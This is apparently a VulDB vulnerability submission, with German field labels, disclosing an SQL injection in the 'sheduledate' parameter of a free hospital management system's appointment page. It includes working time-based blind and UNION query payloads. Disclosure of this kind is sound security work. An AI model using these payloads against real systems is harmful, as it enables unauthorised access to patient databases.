| Titel | SQL injection in Free Hospital Management System for Small Practices 1.0 |
|---|
| Beschreibung | There is an SQL injection vulnerability in the 'sheduledate' parameter of /patient/appointment.php.
---
Parameter: sheduledate (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sheduledate=2023-08-24' AND (SELECT 7187 FROM (SELECT(SLEEP(5)))sIsM) AND 'mPuB'='mPuB
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: sheduledate=2023-08-24' UNION ALL SELECT 43,43,43,43,43,43,43,CONCAT(0x7170717a71,0x716e716574505a584f787954516777664772734e566b676d717a45666e65774d5a554250687a6748,0x71626b7871),43-- -
--- |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html |
|---|
| Benutzer | CuteCabbage (UID 52514) |
|---|
| Einreichung | 11.08.2023 04:08 (vor 3 Jahren) |
|---|
| Moderieren | 20.08.2023 09:01 (9 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 237562 [SourceCodester Free Hospital Management System for Small Practices /patient/appointment.php SQL Injection] |
|---|
| Punkte | 20 |
|---|